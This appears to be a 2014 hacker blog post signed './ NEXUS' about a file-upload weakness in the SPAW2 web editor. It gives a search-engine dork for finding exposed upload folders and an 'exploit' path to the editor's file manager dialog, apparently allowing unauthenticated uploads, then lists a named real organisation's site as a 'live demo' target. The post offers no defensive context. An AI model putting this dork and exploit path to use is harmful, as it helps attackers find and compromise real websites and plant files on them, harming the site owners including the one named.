Wednesday, 25 June 2014

Spaw Uploader (Vulnerability)

Dork:
inurl:”spaw2/uploads/files/”
Exploit:
Add: spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files 
Live Demo:
http://www.tieca.com/backoffice_tieca/spaw2/uploads/files/index.htm
./ NEXUS